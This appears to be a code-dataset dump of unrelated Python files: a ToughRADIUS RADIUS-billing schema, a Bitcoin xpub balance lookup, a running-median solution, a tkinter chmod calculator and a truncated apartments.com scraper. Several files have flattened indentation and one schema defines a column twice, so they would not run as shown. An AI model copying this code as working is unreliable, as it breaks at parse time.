__tablename__ = 'tr_customer_order'
__table_args__ = {}
order_id = Column('order_id', Unicode(length=32),primary_key=True,nullable=False,doc=u"订单id")
customer_id = Column('customer_id', INTEGER(),nullable=False,doc=u"用户id")
product_id = Column('product_id', INTEGER(),nullable=False,doc=u"资费id")
account_number = Column('account_number', Unicode(length=32),nullable=False,doc=u"上网账号")
order_fee = Column('order_fee', INTEGER(), nullable=False,doc=u"订单费用")
actual_fee = Column('actual_fee', INTEGER(), nullable=False,doc=u"实缴费用")
pay_status = Column('pay_status', INTEGER(), nullable=False,doc=u"支付状态")
accept_id = Column('accept_id', INTEGER(),nullable=False,doc=u"受理id")
order_source = Column('order_source', Unicode(length=64), nullable=False,doc=u"订单来源")
order_desc = Column('order_desc', Unicode(length=255),doc=u"订单描述")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"交易时间")
class TrAccount(DeclarativeBase):
"""
    Internet account table; a customer may hold several accounts at the same time.
    account_number is the account bound to each subscribed product and is globally unique.
    Account status: 0 = reserved, 1 = active, 2 = suspended, 3 = cancelled, 4 = expired.
"""
__tablename__ = 'tr_account'
__table_args__ = {}
account_number = Column('account_number', Unicode(length=32),primary_key=True,nullable=False,doc=u"上网账号")
customer_id = Column('customer_id', INTEGER(),nullable=False,doc=u"用户id")
client_id = Column('client_id', INTEGER(),nullable=False,doc=u"客户id")
product_id = Column('product_id', INTEGER(),nullable=False,doc=u"资费id")
group_id = Column('group_id', INTEGER(),doc=u"用户组id")
password = Column('password', Unicode(length=128), nullable=False,doc=u"上网密码")
status = Column('status', INTEGER(), nullable=False,doc=u"用户状态")
install_address = Column('install_address', Unicode(length=128), nullable=False,doc=u"装机地址")
balance = Column('balance', INTEGER(), nullable=False, default=0, doc=u"用户余额-分")
time_length = Column('time_length', INTEGER(), nullable=False,default=0,doc=u"用户时长-秒")
flow_length = Column('flow_length', INTEGER(), nullable=False,default=0,doc=u"用户流量-kb")
expire_date = Column('expire_date', Unicode(length=10), nullable=False,doc=u"过期时间- ####-##-##")
user_concur_number = Column('user_concur_number', INTEGER(), nullable=False,doc=u"用户并发数")
bind_mac = Column('bind_mac', SMALLINT(), nullable=False,doc=u"是否绑定mac")
bind_vlan = Column('bind_vlan', SMALLINT(), nullable=False,doc=u"是否绑定vlan")
mac_addr = Column('mac_addr', Unicode(length=17),doc=u"mac地址")
vlan_id1 = Column('vlan_id1', INTEGER(),doc=u"内层vlan")
vlan_id2 = Column('vlan_id2', INTEGER(),doc=u"外层vlan")
ip_address = Column('ip_address', Unicode(length=15),doc=u"静态IP地址")
last_pause = Column('last_pause', Unicode(length=19),doc=u"最后停机时间")
account_desc = Column(u'account_desc', Unicode(255),doc=u"用户描述")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"创建时间")
update_time = Column('update_time', Unicode(length=19), nullable=False,doc=u"更新时间")
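# Illustrative helper (an assumption, not part of the original schema): a
# readable mapping for the TrAccount.status codes documented above.
ACCOUNT_STATUS_LABELS = {
    0: u"reserved",
    1: u"active",
    2: u"suspended",
    3: u"cancelled",
    4: u"expired",
}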
class TrAccountAttr(DeclarativeBase):
"""上网账号扩展策略属性表"""
__tablename__ = 'tr_account_attr'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"属性id")
account_number = Column('account_number', Unicode(length=32),nullable=False,doc=u"上网账号")
attr_type = Column('attr_type', INTEGER(), default=1, doc=u"属性类型,0,一般;1,radius属性")
attr_name = Column(u'attr_name', Unicode(length=255), nullable=False,doc=u"属性名")
attr_value = Column(u'attr_value', Unicode(length=255), nullable=False,doc=u"属性值")
attr_desc = Column(u'attr_desc', Unicode(length=255),doc=u"属性描述")
UniqueConstraint('account_number','attr_name','attr_type',name='tr_account_attr_idx')
class TrProduct(DeclarativeBase):
'''
    Product (billing plan) table.
    product_policy (billing policy): 0 = prepaid monthly, 1 = prepaid time-based, 2 = buyout monthly, 3 = buyout time-based, 4 = prepaid traffic, 5 = buyout traffic, 6 = flexible billing.
    product_status (sales status): 0 = active, 1 = disabled; a disabled plan can no longer be ordered.
'''
__tablename__ = 'tr_product'
__table_args__ = {}
id = Column('id', INTEGER(),primary_key=True,autoincrement=1,nullable=False,doc=u"资费id")
product_name = Column('product_name', Unicode(length=64), nullable=False,doc=u"资费名称")
product_policy = Column('product_policy', INTEGER(), nullable=False,doc=u"资费策略")
product_status = Column('product_status', SMALLINT(), nullable=False,doc=u"资费状态")
bind_mac = Column('bind_mac', SMALLINT(), nullable=False,doc=u"是否绑定mac")
bind_vlan = Column('bind_vlan', SMALLINT(), nullable=False,doc=u"是否绑定vlan")
concur_number = Column('concur_number', INTEGER(), nullable=False,doc=u"并发数")
fee_period = Column('fee_period', Unicode(length=11),doc=u"开放认证时段")
fee_months = Column('fee_months', INTEGER(),doc=u"买断授权月数")
fee_times = Column('fee_times', INTEGER(),doc=u"买断时长(秒)")
fee_flows = Column('fee_flows', INTEGER(),doc=u"买断流量(kb)")
fee_price = Column('fee_price', INTEGER(),nullable=False,doc=u"资费价格")
fee_period = Column('fee_period', Unicode(length=11),doc=u"计费认证时段")
input_max_limit = Column('input_max_limit', INTEGER(), nullable=False,doc=u"上行速率")
output_max_limit = Column('output_max_limit', INTEGER(), nullable=False,doc=u"下行速率")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"创建时间")
update_time = Column('update_time', Unicode(length=19), nullable=False,doc=u"更新时间")
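# Illustrative helper (an assumption, not part of the original schema): a
# readable mapping for the TrProduct.product_policy codes documented above.
PRODUCT_POLICY_LABELS = {
    0: u"prepaid monthly",
    1: u"prepaid time-based",
    2: u"buyout monthly",
    3: u"buyout time-based",
    4: u"prepaid traffic",
    5: u"buyout traffic",
    6: u"flexible billing",
}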
class TrProductAttr(DeclarativeBase):
    '''Extended attributes for products.'''
__tablename__ = 'tr_product_attr'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"属性id")
product_id = Column('product_id', INTEGER(),nullable=False,doc=u"资费id")
attr_type = Column('attr_type', INTEGER(), default=1, doc=u"属性类型,0,一般;1,radius属性")
attr_name = Column(u'attr_name', Unicode(length=255), nullable=False,doc=u"属性名")
attr_value = Column(u'attr_value', Unicode(length=255), nullable=False,doc=u"属性值")
attr_desc = Column(u'attr_desc', Unicode(length=255),doc=u"属性描述")
UniqueConstraint('product_id','attr_type',name='tr_product_attr_idx')
class TrBilling(DeclarativeBase):
"""计费信息表 is_deduct 0 未扣费 1 已扣费"""
__tablename__ = 'tr_billing'
__table_args__ = { }
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"计费id")
account_number = Column(u'account_number', Unicode(length=253), nullable=False,doc=u"上网账号")
nas_addr = Column(u'nas_addr', Unicode(length=15), nullable=False,doc=u"bas地址")
acct_session_id = Column(u'acct_session_id', Unicode(length=253), nullable=False,doc=u"会话id")
acct_start_time = Column(u'acct_start_time', Unicode(length=19), nullable=False,doc=u"计费开始时间")
acct_session_time = Column(u'acct_session_time', INTEGER(), nullable=False,doc=u"会话时长")
input_total = Column(u'input_total', INTEGER(),doc=u"会话的上行流量(kb)")
output_total = Column(u'output_total', INTEGER(),doc=u"会话的下行流量(kb)")
acct_times = Column(u'acct_times', INTEGER(), nullable=False,doc=u"扣费时长(秒)")
acct_flows = Column(u'acct_flows', INTEGER(), nullable=False,doc=u"扣费流量(kb)")
acct_fee = Column(u'acct_fee', INTEGER(), nullable=False,doc=u"应扣费用")
actual_fee = Column('actual_fee', INTEGER(), nullable=False,doc=u"实扣费用")
balance = Column('balance', INTEGER(), nullable=False,doc=u"当前余额")
time_length = Column('time_length', INTEGER(), nullable=False,default=0,doc=u"当前用户时长-秒")
flow_length = Column('flow_length', INTEGER(), nullable=False,default=0,doc=u"当前用户流量-kb")
is_deduct = Column(u'is_deduct', INTEGER(), nullable=False,doc=u"是否扣费")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"计费时间")
class TrTicket(DeclarativeBase):
"""上网日志表"""
__tablename__ = 'tr_ticket'
__table_args__ = { }
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"日志id")
account_number = Column(u'account_number', Unicode(length=253), nullable=False,doc=u"上网账号")
acct_input_gigawords = Column(u'acct_input_gigawords', INTEGER(),doc=u"会话的上行的字(4字节)的吉倍数")
acct_output_gigawords = Column(u'acct_output_gigawords', INTEGER(),doc=u"会话的下行的字(4字节)的吉倍数")
acct_input_octets = Column(u'acct_input_octets', INTEGER(),doc=u"会话的上行流量(字节数)")
acct_output_octets = Column(u'acct_output_octets', INTEGER(),doc=u"会话的下行流量(字节数)")
acct_input_packets = Column(u'acct_input_packets', INTEGER(),doc=u"会话的上行包数量")
acct_output_packets = Column(u'acct_output_packets', INTEGER(),doc=u"会话的下行包数量")
acct_session_id = Column(u'acct_session_id', Unicode(length=253), nullable=False,doc=u"会话id")
acct_session_time = Column(u'acct_session_time', INTEGER(), nullable=False,doc=u"会话时长")
acct_start_time = Column(u'acct_start_time', Unicode(length=19), nullable=False,doc=u"会话开始时间")
acct_stop_time = Column(u'acct_stop_time', Unicode(length=19), nullable=False,doc=u"会话结束时间")
acct_terminate_cause = Column(u'acct_terminate_cause',INTEGER(),doc=u"会话中止原因")
mac_addr = Column(u'mac_addr', Unicode(length=128),doc=u"mac地址")
calling_station_id = Column(u'calling_station_id', Unicode(length=128),doc=u"用户接入物理信息")
framed_netmask = Column(u'framed_netmask', Unicode(length=15),doc=u"地址掩码")
framed_ipaddr = Column(u'framed_ipaddr', Unicode(length=15),doc=u"IP地址")
nas_class = Column(u'nas_class', Unicode(length=253),doc=u"bas class")
nas_addr = Column(u'nas_addr', Unicode(length=15), nullable=False,doc=u"bas地址")
nas_port = Column(u'nas_port', Unicode(length=32),doc=u"接入端口")
nas_port_id = Column(u'nas_port_id', Unicode(length=255),doc=u"接入端口物理信息")
nas_port_type = Column(u'nas_port_type', INTEGER(),doc=u"接入端口类型")
service_type = Column(u'service_type', INTEGER(),doc=u"接入服务类型")
session_timeout = Column(u'session_timeout', INTEGER(),doc=u"会话超时时间")
start_source = Column(u'start_source', INTEGER(), nullable=False,doc=u"会话开始来源")
stop_source = Column(u'stop_source', INTEGER(), nullable=False,doc=u"会话中止来源")
class TrOnline(DeclarativeBase):
"""用户在线信息表"""
__tablename__ = 'tr_online'
__table_args__ = {
'mysql_engine' : 'MEMORY'
}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"在线id")
account_number = Column(u'account_number', Unicode(length=32), nullable=False, index=True, doc=u"上网账号")
nas_addr = Column(u'nas_addr', Unicode(length=32), nullable=False,index=True, doc=u"bas地址")
acct_session_id = Column(u'acct_session_id', Unicode(length=64),index=True, nullable=False,doc=u"会话id")
acct_start_time = Column(u'acct_start_time', Unicode(length=19), nullable=False,doc=u"会话开始时间")
framed_ipaddr = Column(u'framed_ipaddr', Unicode(length=32), nullable=False,doc=u"IP地址")
mac_addr = Column(u'mac_addr', Unicode(length=32), nullable=False,doc=u"mac地址")
nas_port_id = Column(u'nas_port_id', Unicode(length=255), nullable=False,doc=u"接入端口物理信息")
billing_times = Column(u'billing_times', INTEGER(), nullable=False,doc=u"已记账时间")
input_total = Column(u'input_total', INTEGER(),doc=u"上行流量(kb)")
output_total = Column(u'output_total', INTEGER(),doc=u"下行流量(kb)")
start_source = Column(u'start_source', SMALLINT(), nullable=False,doc=u"记账开始来源")
UniqueConstraint('nas_addr', 'acct_session_id', name='unique_nas_session')
class TrAcceptLog(DeclarativeBase):
'''
    Service acceptance log table.
    accept_type: open = account opening, pause = suspension, resume = reactivation, cancel = cancellation, next = renewal, charge = top-up.
'''
__tablename__ = 'tr_accept_log'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"日志id")
accept_type = Column(u'accept_type', Unicode(length=16), nullable=False,doc=u"受理类型")
accept_desc = Column(u'accept_desc', Unicode(length=512),doc=u"受理描述")
account_number = Column(u'account_number', Unicode(length=32), nullable=False,doc=u"上网账号")
operator_name = Column(u'operator_name', Unicode(32),doc=u"操作员名")
accept_source = Column(u'accept_source', Unicode(length=128),doc=u"受理渠道来源")
accept_time = Column(u'accept_time', Unicode(length=19), nullable=False,doc=u"受理时间")
class TrOperateLog(DeclarativeBase):
"""操作日志表"""
__tablename__ = 'tr_operate_log'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"日志id")
operator_name = Column(u'operator_name', Unicode(32), nullable=False,doc=u"操作员名称")
operate_ip = Column(u'operate_ip', Unicode(length=128),doc=u"操作员ip")
operate_time = Column(u'operate_time', Unicode(length=19), nullable=False,doc=u"操作时间")
operate_desc = Column(u'operate_desc', Unicode(length=1024),doc=u"操作描述")
###############################################################################
# Statistics data models ####
###############################################################################
class TrOnlineStat(DeclarativeBase):
    """Online user statistics table"""
    __tablename__ = 'tr_online_stat'
    __table_args__ = {}
    id = Column(u'id', INTEGER(), primary_key=True, nullable=False, doc=u"id")
    node_id = Column('node_id', INTEGER(), nullable=False, doc=u"node id")
    stat_time = Column(u'stat_time', INTEGER(), nullable=False, doc=u"statistics time")
    total = Column(u'total', INTEGER(), doc=u"online count")
class TrFlowStat(DeclarativeBase):
    """User traffic statistics table"""
    __tablename__ = 'tr_flow_stat'
    __table_args__ = {}
    id = Column(u'id', INTEGER(), primary_key=True, nullable=False, doc=u"id")
    node_id = Column('node_id', INTEGER(), nullable=False, doc=u"node id")
    stat_time = Column(u'stat_time', INTEGER(), nullable=False, doc=u"statistics time")
    input_total = Column(u'input_total', INTEGER(), doc=u"upstream traffic (KB)")
    output_total = Column(u'output_total', INTEGER(), doc=u"downstream traffic (KB)")
class TrUserStat(DeclarativeBase):
    """28. User growth statistics"""
    __tablename__ = 'tr_user_stat'
    __table_args__ = {}
    node_id = Column(u'node_id', INTEGER(), primary_key=True, nullable=False, doc=u"node id")
    stat_day = Column(u'stat_day', Unicode(length=10), primary_key=True, nullable=False, doc=u"statistics date")
    open_count = Column(u'open_count', INTEGER(), nullable=False, doc=u"accounts opened")
    pause_count = Column(u'pause_count', INTEGER(), nullable=False, doc=u"accounts suspended")
    resume_count = Column(u'resume_count', INTEGER(), nullable=False, doc=u"accounts resumed")
    cancel_count = Column(u'cancel_count', INTEGER(), nullable=False, doc=u"accounts cancelled")
    next_count = Column(u'next_count', INTEGER(), nullable=False, doc=u"accounts renewed")
    valid_count = Column(u'valid_count', INTEGER(), nullable=False, doc=u"active accounts")
class TrProductStat(DeclarativeBase):
    """29. Product (tariff) statistics table"""
    __tablename__ = 'tr_product_stat'
    __table_args__ = {}
    node_id = Column(u'node_id', INTEGER(), primary_key=True, nullable=False, doc=u"node id")
    stat_day = Column(u'stat_day', Unicode(length=10), primary_key=True, nullable=False, doc=u"statistics date")
    product_id = Column('product_id', INTEGER(), primary_key=True, nullable=False, doc=u"product id")
    count = Column(u'count', INTEGER(), nullable=False, doc=u"subscription count")
class TrFeeStat(DeclarativeBase):
    """30. Fee statistics table"""
    __tablename__ = 'tr_fee_stat'
    __table_args__ = {}
    node_id = Column(u'node_id', INTEGER(), primary_key=True, nullable=False, doc=u"node id")
    stat_day = Column(u'stat_day', Unicode(length=10), primary_key=True, nullable=False, doc=u"statistics date")
    income_fee = Column(u'income_fee', INTEGER(), nullable=False, doc=u"income")
    refund_fee = Column(u'refund_fee', INTEGER(), nullable=False, doc=u"refund")
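# The helpers below render the data dictionary as markdown: one "## <table>" heading
# per model, followed by a table with columns attribute | type(length) | nullable | description.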
def print_header():
    print "|%s|%s|%s|%s|" % ("attribute".ljust(26, ' '), "type(length)".ljust(25, ' '), "nullable".ljust(23, ' '), 'description'.ljust(30, ' '))
    print "|%s|:%s|:%s:|%s:|" % ("-"*23, "-"*17, "-"*16, "-"*26)

def print_model(tmdl):
    print "##", tmdl.__tablename__
    print
    if tmdl.__doc__:
        print tmdl.__doc__
    print
    pk = ",".join(c.name for c in tmdl.__table__.primary_key.columns)
    print_header()
    for c in tmdl.__table__.columns:
        # print c.name, c.type, c.nullable
        _name = str(c.name).ljust(21, " ")
        _type = str(c.type).ljust(16, " ")
        _null = str(c.nullable).ljust(16, " ")
        _doc = str((c.doc or '').encode("utf-8")).ljust(30, ' ')
        print "|%s |%s |%s |%s|" % (_name, _type, _null, _doc)
# print_end()
mdls = [
TrProduct,
TrCustomer,
TrAccount,
TrBas,
TrNode
]
if __name__ == '__main__':
print "# ToughRADIUS数据字典\n\n"
for mdl in mdls:
print_model(mdl)
print
| StarcoderdataPython |
3328820 | <filename>app/accounts/btc_xpub.py
import requests
from btcpy.setup import setup
from btcpy.structs.hd import ExtendedPublicKey
from btcpy.structs.address import P2shAddress, P2wpkhAddress
from .. import Account
setup('mainnet')
# TO DO:
# Separate addresses into different balances (name each, e.g. 'change0, spend1')
# Alternatives for address='nested'
class btc_xpub(Account):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.xpub = ExtendedPublicKey.decode(self.address)
def load_balance(self):
bal = 0
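        # Scan both the external chain (change=0) and the internal/change chain
        # (change=1), deriving one child address at a time and summing balances
        # until an address whose total_received is zero is reached.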
for change in [0, 1]:
used = True
i = 0
while True:
pk = derive_key(self.xpub, change, index=i)
i += 1
url = 'https://api.blockcypher.com/v1/btc/main/addrs/'+pk+'/balance'
data = requests.get(url, timeout=10).json()
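                # BlockCypher reports balances in satoshis; divide by 1e8 to get BTC.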
b = float(data['balance']) / 100000000
bal += b
if float(data['total_received']) == 0:
break
return {'BTC':bal}
def derive_key(xpub, change, index, address='nested'):
path = './'+str(change)+'/'+str(index)
hash = xpub.derive(path).key.hash()
if address == 'nested':
return str(P2shAddress.from_script(P2wpkhAddress(hash, version=0).to_script()))
raise NotImplementedError("Only 'nested' xpub addresses are supported")
def address_is_used(addr):
url = 'https://blockchain.info/q/getreceivedbyaddress/' + addr
return float(requests.get(url,timeout=10).text) != 0
| StarcoderdataPython |
3207136 | #!/bin/python3
import os
import sys
import heapq
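
# Running median via two heaps: `lowers` is a max-heap (values stored negated)
# holding the smaller half of the stream, `highers` is a min-heap holding the
# larger half; the median is read from the heap tops after each insertion.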
def addNum(num, lowers, highers):
if not lowers or num < -lowers[0]:
heapq.heappush(lowers,-num)
else:
heapq.heappush(highers,num)
def rebalance(lowers, highers):
if len(lowers) - len(highers) >= 2:
heapq.heappush(highers,-heapq.heappop(lowers))
elif len(highers) - len(lowers) >= 2:
heapq.heappush(lowers,-heapq.heappop(highers))
def getMedian(lowers, highers):
if len(lowers) == len(highers):
return (-lowers[0] + highers[0])/2
if len(lowers) > len(highers):
return float(-lowers[0])
else:
return float(highers[0])
#
# Complete the runningMedian function below.
#
def runningMedian(a):
maxHeap = [] # max heap, vals should go in and come out negated
minHeap = [] # min heap, vals should go in positive
result = []
for v in a:
addNum(v, maxHeap, minHeap)
rebalance(maxHeap, minHeap)
result.append(round(getMedian(maxHeap, minHeap),1))
return result
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
a_count = int(input())
a = []
for _ in range(a_count):
a_item = int(input())
a.append(a_item)
result = runningMedian(a)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| StarcoderdataPython |
1635085 | <reponame>lazypwny751/ChmodCalculator
import tkinter as tk
import os
from modules import *
if os.name == "nt":
os.system("cls")
elif os.name == "posix":
os.system("clear")
banner = Beyaz+"""
██╗ ██████╗ ██████╗ ███████╗
██║ ██╔═══██╗██╔════╝ ██╔════╝
██║ ██║ ██║██║ ███╗███████╗
██║ ██║ ██║██║ ██║╚════██║
███████╗╚██████╔╝╚██████╔╝███████║
╚══════╝ ╚═════╝ ╚═════╝ ╚══════╝
"""
print(banner)
window = tk.Tk()
#Head
window.title("Chmod Calculator")
window.geometry("500x250")
window.resizable(False,False)
window.iconbitmap(r"simge.ico")
#Body
#Owners
owner1 = tk.IntVar()
owner2 = tk.IntVar()
owner3 = tk.IntVar()
owner1.set(0)
owner2.set(0)
owner3.set(0)
#Groups
group1 = tk.IntVar()
group2 = tk.IntVar()
group3 = tk.IntVar()
group1.set(0)
group2.set(0)
group3.set(0)
#Others
other1 = tk.IntVar()
other2 = tk.IntVar()
other3 = tk.IntVar()
other1.set(0)
other2.set(0)
other3.set(0)
#function
value=0
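# chmod digit weights: owner r/w/x add 400/200/100, group r/w/x add 40/20/10,
# other r/w/x add 4/2/1; chx() sums the weights of the checked boxes and prints
# the resulting mode to the terminal.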
def chx():
value=0
if owner1.get() == 0:
pass
else:
value+=400
if owner2.get() == 0:
pass
else:
value+=200
if owner3.get() == 0:
pass
else:
value+=100
if group1.get() == 0:
pass
else:
value+=40
if group2.get() == 0:
pass
else:
value+=20
if group3.get() == 0:
        pass
else:
value+=10
if other1.get() == 0:
pass
else:
value+=4
if other2.get() == 0:
pass
else:
value+=2
if other3.get() == 0:
pass
else:
value+=1
if os.name == "nt":
os.system("cls")
elif os.name == "posix":
os.system("clear")
print(value)
#Owner
label = tk.Label(window, text="Owner", font="20")
label.pack(side=tk.LEFT)
label.place(x=50,y=0)
checkbox4 = tk.Checkbutton(window, text="Read", font="15", variable=owner1, command=chx)
checkbox4.pack()
checkbox4.place(x=50, y=35)
checkbox5 = tk.Checkbutton(window, text="Write", font="15", variable=owner2, command=chx)
checkbox5.pack()
checkbox5.place(x=50, y=75)
checkbox6 = tk.Checkbutton(window, text="Execute", font="15", variable=owner3, command=chx)
checkbox6.pack()
checkbox6.place(x=50, y=105)
#Group
label2 = tk.Label(window, text="Group", font="20")
label2.pack()
result = tk.Label(window, text="The answer will appear in the terminal", font="20")
result.pack()
result.place(x=125, y=175)
checkbox1 = tk.Checkbutton(window, text="Read", font="15", variable=group1, command=chx)
checkbox1.pack()
checkbox1.place(x=210, y=35)
checkbox2 = tk.Checkbutton(window, text="Write", font="15", variable=group2, command=chx)
checkbox2.pack()
checkbox2.place(x=210, y=70)
checkbox3 = tk.Checkbutton(window, text="Execute", font="15", variable=group3, command=chx)
checkbox3.pack()
checkbox3.place(x=210, y=105)
#Other
label3 = tk.Label(window, text="Other", font="20")
label3.pack(side=tk.RIGHT)
label3.place(x=400, y=0)
checkbox7 = tk.Checkbutton(window, text="Read", font="15", variable=other1, command=chx)
checkbox7.pack()
checkbox7.place(x=400, y=35)
checkbox8 = tk.Checkbutton(window, text="Write", font="15", variable=other2, command=chx)
checkbox8.pack()
checkbox8.place(x=400, y=70)
checkbox9 = tk.Checkbutton(window, text="Execute", font="15", variable=other3, command=chx)
checkbox9.pack()
checkbox9.place(x=400, y=105)
window.mainloop()
| StarcoderdataPython |
3256949 | <reponame>mgiangreco/apartments-scraper
import boto3
import csv
import datetime
import json
import re
import sys
import datetime
import requests
import os
from bs4 import BeautifulSoup
# Config parser was renamed in Python 3
try:
import configparser
except ImportError:
import ConfigParser as configparser
def create_csv(search_urls, fname):
"""Create a CSV file with information that can be imported into ideal-engine"""
# avoid the issue on Windows where there's an extra space every other line
if sys.version_info[0] == 2: # Not named on 2.6
access = 'wb'
kwargs = {}
else:
access = 'wt'
kwargs = {'newline': ''}
# open file for writing
csv_file = open(fname, access, **kwargs)
# write to CSV
try:
writer = csv.writer(csv_file)
# this is the header (make sure it matches with the fields in
# write_parsed_to_csv)
header = ['Option Name', 'Contact', 'Address', 'Size',
'Rent', 'Monthly Fees', 'One Time Fees',
'Pet Policy',
'Parking', 'Gym', 'Kitchen',
'Amenities', 'Features', 'Living Space',
'Lease Info', 'Services',
'Property Info', 'Indoor Info', 'Outdoor Info',
'Images', 'Description', 'ds']
# write the header
writer.writerow(header)
# parse current entire apartment list including pagination for all search urls
for url in search_urls:
print ("Now getting apartments from: %s" % url)
write_parsed_to_csv(url, writer)
finally:
csv_file.close()
def write_parsed_to_csv(page_url, writer):
"""Given the current page URL, extract the information from each apartment in the list"""
# read the current page
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}
page = requests.get(page_url, headers=headers)
# soupify the current page
soup = BeautifulSoup(page.content, 'html.parser')
soup.prettify()
# only look in this region
soup = soup.find('div', class_='placardContainer')
# append the current apartments to the list
for item in soup.find_all('article', class_='placard'):
url = ''
rent = ''
contact = ''
if item.find('a', class_='placardTitle') is None: continue
url = item.find('a', class_='placardTitle').get('href')
# get the rent and parse it to unicode
obj = item.find('span', class_='altRentDisplay')
if obj is not None:
rent = obj.getText().strip()
# get the phone number and parse it to unicode
obj = item.find('div', class_='phone')
if obj is not None:
contact = obj.getText().strip()
# get the other fields to write to the CSV
fields = parse_apartment_information(url)
# make this wiki markup
fields['name'] = '[' + str(fields['name']) + '](' + url + ')'
fields['address'] = '[' + fields['address'] + '](' + ')'
# get the datetime
fields['ds'] = str(datetime.datetime.utcnow().date())
# fill out the CSV file
row = [fields['name'], contact,
fields['address'], fields['size'],
rent, fields['monthFees'], fields['onceFees'],
fields['petPolicy'],
fields['parking'], fields['gym'], fields['kitchen'],
fields['amenities'], fields['features'], fields['space'],
fields['lease'], fields['services'],
fields['info'], fields['indoor'], fields['outdoor'],
fields['img'], fields['description'], fields['ds']]
# write the row
writer.writerow(row)
# get the next page URL for pagination
next_url = soup.find('a', class_='next')
# if there's only one page this will actually be none
if next_url is None:
return
# get the actual next URL address
next_url = next_url.get('href')
if next_url is None or next_url == '' or next_url == 'javascript:void(0)':
return
# recurse until the last page
write_parsed_to_csv(next_url, writer)
def parse_apartment_information(url):
"""For every apartment page, populate the required fields to be written to CSV"""
# read the current page
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}
page = requests.get(url, headers=headers)
# soupify the current page
soup = BeautifulSoup(page.content, 'html.parser')
soup.prettify()
# the information we need to return as a dict
fields = {}
# get the name of the property
get_property_name(soup, fields)
# get the address of the property
get_property_address(soup, fields)
# get the size of the property
get_property_size(soup, fields)
# get the one time and monthly fees
get_fees(soup, fields)
# get the images as a list
get_images(soup, fields)
# get the description section
get_description(soup, fields)
# only look in this section (other sections are for example for printing)
soup = soup.find('section', class_='specGroup js-specGroup')
# get the pet policy of the property
get_pet_policy(soup, fields)
# get parking information
get_parking_info(soup, fields)
# get the amenities description
get_field_based_on_class(soup, 'amenities', 'featuresIcon', fields)
# get the 'interior information'
get_field_based_on_class(soup, 'indoor', 'interiorIcon', fields)
# get the 'outdoor information'
get_field_based_on_class(soup, 'outdoor', 'parksIcon', fields)
# get the 'gym information'
get_field_based_on_class(soup, 'gym', 'fitnessIcon', fields)
# get the 'kitchen information'
get_field_based_on_class(soup, 'kitchen', 'kitchenIcon', fields)
# get the 'services information'
get_field_based_on_class(soup, 'services', 'servicesIcon', fields)
# get the 'living space information'
get_field_based_on_class(soup, 'space', 'sofaIcon', fields)
# get the lease length
get_field_based_on_class(soup, 'lease', 'leaseIcon', fields)
# get the 'property information'
get_features_and_info(soup, fields)
return fields
def prettify_text(data):
"""Given a string, replace unicode chars and make it prettier"""
# format it nicely: replace multiple spaces with just one
data = re.sub(' +', ' ', data)
# format it nicely: replace multiple new lines with just one
data = re.sub('(\r?\n *)+', '\n', data)
# format it nicely: replace bullet with *
data = re.sub(u'\u2022', '* ', data)
# format it nicely: replace registered symbol with (R)
data = re.sub(u'\xae', ' (R) ', data)
# format it nicely: remove trailing spaces
data = data.strip()
# format it nicely: encode it, removing special symbols
data = data.encode('utf8', 'ignore')
return str(data).encode('utf-8')
def get_images(soup, fields):
"""Get the images of the apartment"""
fields['img'] = ''
if soup is None: return
# find ul with id fullCarouselCollection
soup = soup.find('ul', {'id': 'fullCarouselCollection'})
if soup is not None:
for img in soup.find_all('img'):
fields['img'] += '![' + img['alt'] + '](' + img['src'] + ') '
def get_description(soup, fields):
"""Get the description for the apartment"""
fields['description'] = ''
if soup is None: return
# find p with itemprop description
obj = soup.find('p', {'itemprop': 'description'})
if obj is not None:
fields['description'] = prettify_text(obj.getText())
def get_property_size(soup, fields):
"""Given a beautifulSoup parsed page, extract the property size of the first one bedroom"""
#note: this might be wrong if there are multiple matches!!!
fields['size'] = ''
if soup is None: return
obj = soup.find('tr', {'data-beds': '1'})
if obj is not None:
data = obj.find('td', class_='sqft').getText()
data = prettify_text(data)
fields['size'] = data
def get_features_and_info(soup, fields):
"""Given a beautifulSoup parsed page, extract the features and property information"""
fields['features'] = ''
fields['info'] = ''
if soup is None: return
obj = soup.find('i', class_='propertyIcon')
if obj is not None:
for obj in soup.find_all('i', class_='propertyIcon'):
data = obj.parent.findNext('ul').getText()
data = prettify_text(data)
if obj.parent.findNext('h3').getText().strip() == 'Features':
# format it nicely: remove trailing spaces
fields['features'] = data
if obj.parent.findNext('h3').getText() == 'Property Information':
# format it nicely: remove trailing spaces
fields['info'] = data
def get_field_based_on_class(soup, field, icon, fields):
"""Given a beautifulSoup parsed page, extract the specified field based on the icon"""
fields[field] = ''
if soup is None: return
obj = soup.find('i', class_=icon)
if obj is not None:
data = obj.parent.findNext('ul').getText()
data = prettify_text(data)
fields[field] = data
def get_parking_info(soup, fields):
"""Given a beautifulSoup parsed page, extract the parking details"""
fields['parking'] = ''
if soup is None: return
obj = soup.find('div', class_='parkingDetails')
if obj is not None:
data = obj.getText()
data = prettify_text(data)
# format it nicely: remove trailing spaces
fields['parking'] = data
def get_pet_policy(soup, fields):
"""Given a beautifulSoup parsed page, extract the pet policy details"""
if soup is None:
fields['petPolicy'] = ''
return
# the pet policy
data = soup.find('div', class_='petPolicyDetails')
if data is None:
data = ''
else:
data = data.getText()
data = prettify_text(data)
# format it nicely: remove the trailing whitespace
fields['petPolicy'] = data
def get_fees(soup, fields):
